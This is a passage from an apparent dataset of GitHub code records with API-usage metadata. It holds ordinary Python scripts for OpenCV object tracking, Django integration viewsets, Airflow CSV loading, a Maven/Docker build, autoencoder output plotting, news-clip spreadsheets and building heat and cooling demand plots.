"line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}]}
+{"seq_id": "14432528471", "text": "\"\"\"Test script for multitracking\n\nThis script is not inteded to be rigorous in software good practices\nThe script is used to learn about the OpenCV lib and in particular about the its Tracker API\n\nSource: https://www.learnopencv.com/multitracker-multiple-object-tracking-using-opencv-c-python/\n\nUsage:\n\n Open a terminal go to the source file dir and type:\n python 02_opencv-multi-tracker-test.py\n\n Select a Tracker from the list \n The video is displayed while the objects are tracked. The rendered video is generated in the same folder (out.mkv)\n\"\"\"\n\nimport sys\nimport cv2\nfrom random import randint\nimport json\n\ntrackerTypes = ['BOOSTING', 'MIL', 'KCF','TLD', 'MEDIANFLOW', 'GOTURN', 'MOSSE', 'CSRT']\n\ndef createTrackerByName(trackerType):\n # Create a tracker based on tracker name\n if trackerType == trackerTypes[0]: \n tracker = cv2.TrackerBoosting_create()\n elif trackerType == trackerTypes[1]: \n tracker = cv2.TrackerMIL_create()\n elif trackerType == trackerTypes[2]:\n tracker = cv2.TrackerKCF_create()\n elif trackerType == trackerTypes[3]:\n tracker = cv2.TrackerTLD_create()\n elif trackerType == trackerTypes[4]:\n tracker = cv2.TrackerMedianFlow_create()\n elif trackerType == trackerTypes[5]:\n tracker = cv2.TrackerGOTURN_create()\n elif trackerType == trackerTypes[6]:\n tracker = cv2.TrackerMOSSE_create()\n elif trackerType == trackerTypes[7]:\n tracker = cv2.TrackerCSRT_create()\n else:\n tracker = None\n print('Incorrect tracker name')\n print('Available trackers are:')\n for t in trackerTypes:\n print(t)\n \n return tracker\n\n\n# Select tracker\nprint(\"Tracker list:\")\nfor i, tracker in enumerate(trackerTypes):\n print( \" \" + str(i) + \" - \" + tracker)\nuser_input = input(\"Select tracker:\")\n\n# Specify the tracker type\ntrackerType = trackerTypes[int(user_input)] \n\n# Set video to load\nvideoPath = \"videos/run.mp4\"\n\n# Create a video capture object to read videos\ncap = cv2.VideoCapture(\"../../data/input.mkv\")\n\n# Define the codec and create VideoWriter object\nw = cap.get(cv2.CAP_PROP_FRAME_WIDTH)\nh = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\nfps = cap.get(cv2.CAP_PROP_FPS)\nprint(w)\nprint(h)\nprint(fps)\nout = cv2.VideoWriter( 'out.mp4',\n cv2.VideoWriter_fourcc(*'DIVX'), #cv2.VideoWriter_fourcc('m', 'p', '4', 'v'), \n int(fps), \n (int(w), int(h))\n )\n\n# Read first frame\nsuccess, frame = cap.read()\n# quit if unable to read the video file\nif not success:\n print('Failed to read video')\n sys.exit()\n\n# Read file that contains the bounding boxes to track\njson_file = \"../../data/initial_conditions.json\"\nwith open(json_file) as f:\n initial_conditions = json.load(f)\n\n## Select boxes\nbboxes = []\ncolors = [] \n\nfor obj in initial_conditions:\n coordinates = tuple(obj[\"coordinates\"])\n bboxes.append(coordinates)\n \n color = (randint(0, 255), randint(0, 255), randint(0, 255))\n colors.append(color)\n\nprint('Selected bounding boxes {}'.format(bboxes)) \n\n# Create MultiTracker object\nmultiTracker = cv2.MultiTracker_create()\n\n# Initialize MultiTracker \nfor bbox in bboxes:\n tracker = createTrackerByName(trackerType)\n multiTracker.add(tracker, frame, bbox)\n\n# Process video and track objects\nwhile cap.isOpened():\n success, frame = cap.read()\n if not success:\n break\n \n # get updated location of objects in subsequent frames\n success, boxes = multiTracker.update(frame)\n\n # draw tracked objects\n for i, newbox in enumerate(boxes):\n p1 = (int(newbox[0]), int(newbox[1]))\n p2 = (int(newbox[0] + newbox[2]), int(newbox[1] + newbox[3]))\n cv2.rectangle(frame, p1, p2, colors[i], 2, 1)\n\n # show frame\n cv2.imshow('MultiTracker', frame)\n \n # Save video\n out.write(frame)\n\n # quit on ESC button\n if cv2.waitKey(1) & 0xFF == 27: # Esc pressed\n break\n\n\n\n \n# Release the capture\ncap.release()\nout.release()\n", "repo_name": "alejandroviegener/ObjectTracker", "sub_path": "research/scripts/02_opencv-multi-tracker-test.py", "file_name": "02_opencv-multi-tracker-test.py", "file_ext": "py", "file_size_in_byte": 4032, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.TrackerBoosting_create", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.TrackerMIL_create", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.TrackerKCF_create", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.TrackerTLD_create", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.TrackerMedianFlow_create", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.TrackerGOTURN_create", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.TrackerMOSSE_create", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.TrackerCSRT_create", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 68, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 69, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 70, "usage_type": "attribute"}, {"api_name": "cv2.VideoWriter", "line_number": 74, "usage_type": "call"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 75, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 85, "usage_type": "call"}, {"api_name": "json.load", "line_number": 90, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 100, "usage_type": "call"}, {"api_name": "cv2.MultiTracker_create", "line_number": 106, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 126, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 129, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 135, "usage_type": "call"}]}
+{"seq_id": "33306300148", "text": "from django.shortcuts import get_object_or_404\nfrom rest_framework import viewsets\nfrom rest_framework.exceptions import (\n NotFound,\n PermissionDenied,\n ValidationError,\n)\n\nfrom environments.models import Environment\nfrom environments.permissions.constants import VIEW_ENVIRONMENT\nfrom projects.permissions import VIEW_PROJECT\n\n\nclass EnvironmentIntegrationCommonViewSet(viewsets.ModelViewSet):\n serializer_class = None\n pagination_class = None # set here to ensure documentation is correct\n model_class = None\n\n def get_queryset(self):\n if getattr(self, \"swagger_fake_view\", False):\n return self.model_class.objects.none()\n\n environment_api_key = self.kwargs[\"environment_api_key\"]\n\n try:\n environment = Environment.objects.get(api_key=environment_api_key)\n if not self.request.user.has_environment_permission(\n VIEW_ENVIRONMENT, environment\n ):\n raise PermissionDenied(\n \"User does not have permission to perform action in environment.\"\n )\n\n return self.model_class.objects.filter(environment=environment)\n except Environment.DoesNotExist:\n raise NotFound(\"Environment not found.\")\n\n def perform_create(self, serializer):\n environment = self.get_environment_from_request()\n\n if self.model_class.objects.filter(environment=environment).exists():\n raise ValidationError(\n f\"{self.model_class.__name__} for environment already exist.\"\n )\n\n serializer.save(environment=environment)\n\n def perform_update(self, serializer):\n environment = self.get_environment_from_request()\n serializer.save(environment=environment)\n\n def get_environment_from_request(self):\n \"\"\"\n Get environment object from URL parameters in request.\n \"\"\"\n return Environment.objects.get(api_key=self.kwargs[\"environment_api_key\"])\n\n\nclass ProjectIntegrationBaseViewSet(viewsets.ModelViewSet):\n serializer_class = None\n pagination_class = None\n model_class = None\n\n def get_queryset(self):\n if getattr(self, \"swagger_fake_view\", False):\n return self.model_class.objects.none()\n\n project = get_object_or_404(\n self.request.user.get_permitted_projects(VIEW_PROJECT),\n pk=self.kwargs[\"project_pk\"],\n )\n return self.model_class.objects.filter(project=project)\n\n def perform_create(self, serializer):\n project_id = self.kwargs[\"project_pk\"]\n if self.model_class.objects.filter(project_id=project_id).exists():\n raise ValidationError(\n f\"{self.model_class.__name__} for this project already exists.\"\n )\n serializer.save(project_id=project_id)\n\n def perform_update(self, serializer):\n project_id = self.kwargs[\"project_pk\"]\n serializer.save(project_id=project_id)\n", "repo_name": "Flagsmith/flagsmith", "sub_path": "api/integrations/common/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2963, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3272, "dataset": "github-code", "pt": "31", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 14, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 14, "usage_type": "name"}, {"api_name": "environments.models.Environment.objects.get", "line_number": 26, "usage_type": "call"}, {"api_name": "environments.models.Environment.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "environments.models.Environment", "line_number": 26, "usage_type": "name"}, {"api_name": "environments.permissions.constants.VIEW_ENVIRONMENT", "line_number": 28, "usage_type": "argument"}, {"api_name": "rest_framework.exceptions.PermissionDenied", "line_number": 30, "usage_type": "call"}, {"api_name": "environments.models.Environment.DoesNotExist", "line_number": 35, "usage_type": "attribute"}, {"api_name": "environments.models.Environment", "line_number": 35, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.NotFound", "line_number": 36, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 42, "usage_type": "call"}, {"api_name": "environments.models.Environment.objects.get", "line_number": 56, "usage_type": "call"}, {"api_name": "environments.models.Environment.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "environments.models.Environment", "line_number": 56, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 59, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 59, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 68, "usage_type": "call"}, {"api_name": "projects.permissions.VIEW_PROJECT", "line_number": 69, "usage_type": "argument"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "36555231041", "text": "import pandas\nimport matplotlib.pyplot as plt\nfrom pyquaternion import Quaternion\n\nfilename = \"/home/joshua/programming/whycode_flight_data/data_135432000000.csv\"\ndata = pandas.read_csv(filename)\n\ndata[\"inverse_orientation_w\"] = \"\"\ndata[\"inverse_orientation_x\"] = \"\"\ndata[\"inverse_orientation_y\"] = \"\"\ndata[\"inverse_orientation_z\"] = \"\"\ndata[\"is_flipped\"] = \"\"\n\n# set default orientation to be normal\nprevious_orientation = Quaternion(1, 0, 0, 0)\nfor index, row in data.iterrows():\n\n # create objects for orientation and inverse orientation\n orientation = Quaternion(row[\"orientation_w\"], row[\"orientation_x\"], row[\"orientation_y\"], row[\"orientation_z\"])\n inverse_orientation = orientation.inverse\n\n data.at[index, \"inverse_orientation_w\"] = inverse_orientation.w\n data.at[index, \"inverse_orientation_x\"] = inverse_orientation.x\n data.at[index, \"inverse_orientation_y\"] = inverse_orientation.y\n data.at[index, \"inverse_orientation_z\"] = inverse_orientation.z\n\n # determine if the orientation is assumed to be flipped\n data.at[index, \"is_flipped\"] = Quaternion.distance(inverse_orientation, previous_orientation) < 0.05\n\n # set iteration values\n if(data.at[index, \"is_flipped\"]):\n orientation = inverse_orientation\n previous_orientation = orientation\n\n data.at[index, \"corrected_orientation_w\"] = orientation.w\n data.at[index, \"corrected_orientation_x\"] = orientation.x\n data.at[index, \"corrected_orientation_y\"] = orientation.y\n data.at[index, \"corrected_orientation_z\"] = orientation.z\n\nfilename_elements = filename.split(\".\")\nnew_filename = filename_elements[0] + \"_fixed.csv\"\ndata.to_csv(new_filename)\n\nprint(\"Saved to: %s\" % new_filename)\n\n# orientation constrained\nfigure = plt.figure()\naxes = figure.gca()\nplt.title(\"Pose estimate sequence number vs. WhyCode orientation.\")\nplt.xlabel(\"Pose estimate number\")\nplt.ylabel(\"Orientation quaternion in camera frame\")\naxes.plot(data[\"orientation_x\"].iloc[500:600], label=\"X\")\naxes.plot(data[\"orientation_y\"].iloc[500:600], label=\"Y\")\naxes.plot(data[\"orientation_z\"].iloc[500:600], label=\"Z\")\naxes.plot(data[\"orientation_w\"].iloc[500:600], label=\"W\")\naxes.legend()\n\n# orientation constrained\nfigure = plt.figure()\naxes = figure.gca()\nplt.title(\"Pose estimate sequence number vs. corrected WhyCode orientation.\")\nplt.xlabel(\"Pose estimate number\")\nplt.ylabel(\"Orientation quaternion in camera frame\")\naxes.plot(data[\"corrected_orientation_x\"].iloc[500:600], label=\"X\")\naxes.plot(data[\"corrected_orientation_y\"].iloc[500:600], label=\"Y\")\naxes.plot(data[\"corrected_orientation_z\"].iloc[500:600], label=\"Z\")\naxes.plot(data[\"corrected_orientation_w\"].iloc[500:600], label=\"W\")\naxes.legend()\n\nplt.show()", "repo_name": "uzgit/flight_analysis", "sub_path": "whycode_orientation_fix.py", "file_name": "whycode_orientation_fix.py", "file_ext": "py", "file_size_in_byte": 2701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 6, "usage_type": "call"}, {"api_name": "pyquaternion.Quaternion", "line_number": 15, "usage_type": "call"}, {"api_name": "pyquaternion.Quaternion", "line_number": 19, "usage_type": "call"}, {"api_name": "pyquaternion.Quaternion.distance", "line_number": 28, "usage_type": "call"}, {"api_name": "pyquaternion.Quaternion", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}]}
+{"seq_id": "74444363928", "text": "import os\nfrom typing import Dict\n\nfrom airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nfrom helpers import (read_sql, AIRFLOW_CONNECTION_ID, CSV_Table, CSV_TABLES,\n QUERIES_PATH, SCHEMA_NAME)\n\n\nclass CSVToTableOperator(BaseOperator):\n ui_color = '#ededed'\n\n @apply_defaults\n def __init__(self,\n schema_name: str = SCHEMA_NAME,\n csv_tables: Dict[str, CSV_Table] = CSV_TABLES,\n queries_path: str = QUERIES_PATH,\n query_file: str = 'copy_csv_data.sql',\n postgres_conn_id: str = AIRFLOW_CONNECTION_ID,\n should_run: bool = True,\n *args, **kwargs):\n super().__init__(*args, **kwargs)\n task_id = str(kwargs['task_id'])\n if task_id.startswith('copy_') and task_id.endswith('_table'):\n # len('copy_') = 5; len('_table') = 6\n self.table = task_id[5:-6]\n else:\n raise ValueError(f'Invalid task_id=\"{task_id}\"')\n self.schema_name = schema_name\n self.csv_tables = csv_tables\n self.queries_path = queries_path\n self.query_file = query_file\n self.postgres_conn_id = postgres_conn_id\n self.should_run = should_run\n\n def execute(self, context):\n query_file = os.path.join(self.queries_path, self.query_file)\n self.log.info(f'Running query from file \"{query_file:s}\" into table '\n f'\"{self.schema_name:s}.{self.table}\"...')\n postgres = PostgresHook(postgres_conn_id=self.postgres_conn_id)\n csv_table = self.csv_tables[self.table]._asdict()\n for csv in csv_table['file_names']:\n sql = read_sql(query_file,\n schema_name=self.schema_name,\n **csv_table,\n file_name=csv)\n if self.should_run:\n postgres.run(sql=sql)\n self.log.info('Done!')\n else:\n self.log.info(sql)\n self.log.info('Skipping this task.')\n", "repo_name": "gcbeltramini/etl-project", "sub_path": "etl/airflow_home/plugins/operators/csv_to_table.py", "file_name": "csv_to_table.py", "file_ext": "py", "file_size_in_byte": 2149, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "airflow.models.BaseOperator", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 18, "usage_type": "name"}, {"api_name": "helpers.CSV_Table", "line_number": 18, "usage_type": "name"}, {"api_name": "helpers.SCHEMA_NAME", "line_number": 17, "usage_type": "name"}, {"api_name": "helpers.CSV_TABLES", "line_number": 18, "usage_type": "name"}, {"api_name": "helpers.QUERIES_PATH", "line_number": 19, "usage_type": "name"}, {"api_name": "helpers.AIRFLOW_CONNECTION_ID", "line_number": 21, "usage_type": "name"}, {"api_name": "airflow.utils.decorators.apply_defaults", "line_number": 15, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "airflow.hooks.postgres_hook.PostgresHook", "line_number": 42, "usage_type": "call"}, {"api_name": "helpers.read_sql", "line_number": 45, "usage_type": "call"}]}
+{"seq_id": "36603419699", "text": "import sys\nimport os\n# from typing import string;\n\nimport logging\n\n\nmainLogger:logging.Logger = logging.getLogger()\n# Run python script for debugging\n\nmainLogger.info(\"-------- Begin test logging -------\")\n\nmavenCmd:str = './mvnw'\nif sys.platform == \"win32\":\n mavenCmd = '.\\mvnw'\n\nretVal = os.system(f'{mavenCmd} test') # Linux bash run\nif retVal != 0: # If failed exit code\n mainLogger.info(\"Maven Test failed, exiting...\")\n sys.exit(1)\n\nmainLogger.info(\"-------- End test logging -------\")\n\n# Build docker image\nmainLogger.info(\"-------- Begin docker build logging -------\")\nretVal = os.system(f'{mavenCmd} spring-boot:build-image -Dspring-boot.build-image.imageName=demo/payroll')\nif retVal != 0:\n mainLogger.error(\"Docker Build failed, exiting...\")\n sys.exit(1)\n\nmainLogger.info(\"-------- End docker build logging -------\")", "repo_name": "adrianAnyansi/SpringBootExercise", "sub_path": "buildScript.py", "file_name": "buildScript.py", "file_ext": "py", "file_size_in_byte": 842, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.Logger", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 20, "usage_type": "call"}, {"api_name": "os.system", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "2104635156", "text": "import sys, os\nsys.path.append(os.path.abspath(\"model/\"))\nsys.path.append(os.path.abspath(\"data_loader/\"))\nsys.path.append(os.path.abspath(\"base/\"))\nsys.path.append(os.path.abspath(\".\"))\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom os.path import expanduser\nfrom model import ResNet_AE\nfrom data_loaders import AcousticDataset\nimport torch\n\ndevice = torch.device(\"cuda:1\" if torch.cuda.is_available() else \"cpu\")\n\ndef save_sample(data, outfile):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n im = ax.imshow(data)\n ratio = 1.0\n xleft, xright = ax.get_xlim()\n ybottom, ytop = ax.get_ylim()\n \n # the abs method is used to make sure that all numbers are positive\n # because x and y axis of an axes maybe inversed.\n ax.set_aspect(abs((xright-xleft)/(ybottom-ytop))*ratio)\n fig.colorbar(im)\n \n # or we can utilise the get_data_ratio method which is more concise\n # ax.set_aspect(1.0/ax.get_data_ratio()*ratio)\n plt.savefig(fname=outfile,dpi=300,format='png')\n\n\n\n\nif __name__ == '__main__':\n home = home = expanduser(\"~\")\n \n save_dir = home + '/acoustic/ae_outputs_batch_16/'\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n\n model = ResNet_AE().to(device)\n \n state = torch.load('/data/acoustic_tmp/ae_acoustic_results_batch_16/models/acoustic_ae/1016_170641/model_best.pth')\n model.load_state_dict(state['state_dict'])\n model.eval()\n\n #load data\n dataset = AcousticDataset('/gsceph/adapd/acoustic/AA_10/train.pkl')\n \n idxs = np.random.randint(0, len(dataset), 10)\n print(idxs)\n data = []\n for i in idxs:\n img, label = dataset[i]\n name = dataset.data[i][0]\n data.append((name, img, label))\n data = np.array(data)\n print(data[:, 0])\n\n #generate data\n imgs = np.expand_dims(np.vstack(data[:, 1]), axis=1)\n print(imgs.shape)\n outputs = model(torch.from_numpy(imgs).to(device)).cpu().detach().numpy()\n\n #plot inputs and outputs\n for index, (full_name, _, label) in enumerate(data):\n name = full_name.split('/')[-1].replace('.pkl', '')\n #print(name)\n save_sample(np.squeeze(imgs[index], axis=0), save_dir + name + '_' + str(label) + '.png')\n save_sample(np.squeeze(outputs[index], axis=0), save_dir + 'output_' + name + '_' + str(label) + '.png')\n\n", "repo_name": "dwidemann/self_supervision_for_transfer_learning", "sub_path": "utils/generate_outputs_from_ae_model.py", "file_name": "generate_outputs_from_ae_model.py", "file_ext": "py", "file_size_in_byte": 2329, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 3, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 14, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 41, "usage_type": "call"}, {"api_name": "model.ResNet_AE", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 45, "usage_type": "call"}, {"api_name": "model.load_state_dict", "line_number": 46, "usage_type": "call"}, {"api_name": "model.eval", "line_number": 47, "usage_type": "call"}, {"api_name": "data_loaders.AcousticDataset", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 72, "usage_type": "call"}]}
+{"seq_id": "35498830375", "text": "#!/usr/bin/env python\n\nif __name__ == \"__main__\":\n import re\n import tablib\n import logging\n import datetime\n import collections\n from argparse import ArgumentParser, FileType\n\n from core import HEADERS\n from core.parsers.mention import Mention\n\n date_prefix = datetime.date.today().strftime(\"%Y%m%d\")\n\n parser = ArgumentParser()\n parser.add_argument('input', metavar='INPUT', type=open)\n parser.add_argument(\"-o\", \"--output\", default=\"%s-newsclips.xls\" % date_prefix)\n args = parser.parse_args()\n\n logging.basicConfig(level=logging.DEBUG)\n\n log = logging.getLogger('newsclips.main')\n\n data = tablib.Dataset(headers=HEADERS)\n\n for line in args.input:\n item = {}\n line = line.strip()\n\n if not line:\n continue\n\n mention = Mention(line)\n mention.append(data)\n\n book = tablib.Databook((data, data.filter([\"in-the-news\"])))\n with open(args.output, 'wb') as fp:\n fp.write(book.xls)\n", "repo_name": "edavis/newsclips", "sub_path": "newsclips.py", "file_name": "newsclips.py", "file_ext": "py", "file_size_in_byte": 986, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "datetime.date.today", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 14, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 21, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "tablib.Dataset", "line_number": 25, "usage_type": "call"}, {"api_name": "core.HEADERS", "line_number": 25, "usage_type": "name"}, {"api_name": "core.parsers.mention.Mention", "line_number": 34, "usage_type": "call"}, {"api_name": "tablib.Databook", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "73090276889", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 14\n\n@author: lkivi\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport numpy as np\n\n\ndef plot_buildings(param, nodes):\n \n\n \n max_width = 20\n shift = 50\n for n in nodes:\n nodes[n][\"x\"] += shift\n nodes[n][\"y\"] += shift\n \n nodes[6][\"x\"] += 12\n nodes[6][\"y\"] += 12\n \n \n \n \n\n total_demands = np.zeros(len(nodes))\n for n in nodes: \n total_demands[n] = sum(sum((nodes[n][\"heat\"][d][t] + nodes[n][\"cool\"][d][t]) for t in range(24)) * param[\"day_weights\"][d] for d in range(param[\"n_clusters\"]))\n max_total_demand = np.max(total_demands)\n \n total = {}\n for demand in [\"heat\", \"cool\"]:\n total[demand] = np.zeros(len(nodes))\n for n in nodes:\n total[demand][n] = sum(sum(nodes[n][demand][d][t] for t in range(24)) * param[\"day_weights\"][d] for d in range(param[\"n_clusters\"]))\n\n fig = plt.figure()\n ax = fig.add_subplot(1,1,1)\n ax.set_xlabel(\"x [m]\", fontweight = \"bold\", fontsize = 12)\n ax.set_ylabel(\"y [m]\", fontweight = \"bold\", fontsize = 12)\n \n width = np.zeros(len(nodes))\n \n for n in nodes:\n width[n] = (total_demands[n]/max_total_demand)**0.25 * max_width\n theta = 360 * total[\"heat\"][n]/(total[\"heat\"][n] + total[\"cool\"][n])\n plt.scatter(nodes[n][\"x\"], nodes[n][\"y\"])\n wedge_heat = patches.Wedge((nodes[n][\"x\"], nodes[n][\"y\"]), width[n], 0, theta, fill = True, facecolor = \"red\", edgecolor = \"black\")\n ax.add_patch(wedge_heat)\n wedge_cool = patches.Wedge((nodes[n][\"x\"], nodes[n][\"y\"]), width[n], theta, 360, fill = True, facecolor = \"blue\", edgecolor = \"black\")\n ax.add_patch(wedge_cool)\n\n # Tag buildings\n for n in nodes:\n if nodes[n][\"name\"] in [\"15.1\", \"04.1\", \"16.4\", \"16.3\"]:\n ax.text(nodes[n][\"x\"], nodes[n][\"y\"]+1.1*width[n], str(n+1), fontsize = 12, horizontalalignment='center', fontweight = \"bold\")\n elif nodes[n][\"name\"] in [\"\"]:\n ax.text(nodes[n][\"x\"]+0.45*width[n], nodes[n][\"y\"]+0.6*width[n], str(n+1), fontsize = 12)\n# ax.plot([nodes[n][\"x\"]+0.2*width[n], nodes[n][\"x\"]+9], [nodes[n][\"y\"]+0.3*width[n],nodes[n][\"y\"]+19], \"black\") \n elif nodes[n][\"name\"] in [\"15.8\"]:\n ax.text(nodes[n][\"x\"], nodes[n][\"y\"]-1.2*width[n], str(n+1), fontsize = 12, horizontalalignment='center', verticalalignment = \"top\")\n# ax.plot([nodes[n][\"x\"]-0.2*width[n], nodes[n][\"x\"]-8], [nodes[n][\"y\"]-0.3*width[n],nodes[n][\"y\"]-18], \"black\")\n elif nodes[n][\"name\"] in [\"\"]:\n ax.text(nodes[n][\"x\"]-0.5*width[n]-20, nodes[n][\"y\"]+0.5*width[n], str(n+1), fontsize = 12)\n# ax.plot([nodes[n][\"x\"]-0.2*width[n], nodes[n][\"x\"]-8], [nodes[n][\"y\"]+0.3*width[n],nodes[n][\"y\"]+15], \"black\") \n else:\n ax.text(nodes[n][\"x\"], nodes[n][\"y\"]+1.2*width[n], str(n+1), fontsize = 12, horizontalalignment='center')\n# 